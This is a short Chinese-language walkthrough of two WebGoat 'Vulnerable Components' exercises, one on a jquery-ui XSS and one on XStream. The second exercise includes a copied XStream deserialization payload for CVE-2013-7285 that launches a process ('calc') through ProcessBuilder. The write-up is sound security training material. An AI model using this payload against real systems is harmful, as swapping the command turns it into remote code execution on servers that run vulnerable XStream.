Vuln & Outdated Components

Vulnerable Components

5

题目告诉我们有的组件可以被黑客简单的攻击,有的组件却不可以。

jquery-ui:1.10.4这个版本的组件有xxs漏洞,点击按钮,可以看到有弹框。

jquery-ui:1.12.0这个版本的组件没有这个漏洞,点击按钮不会出现弹框。

反正第一个按钮我点了没任何反应。

12

此题目仅在 WebGoat 的 Docker 镜像中运行有效。

网上白嫖的一个 CVE-2013-7285 的 payload:

1
2
3
4
5
6
7
8
9
10
11
<contact class='dynamic-proxy'>
  <interface>org.owasp.webgoat.lessons.vulnerablecomponents.Contact</interface>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>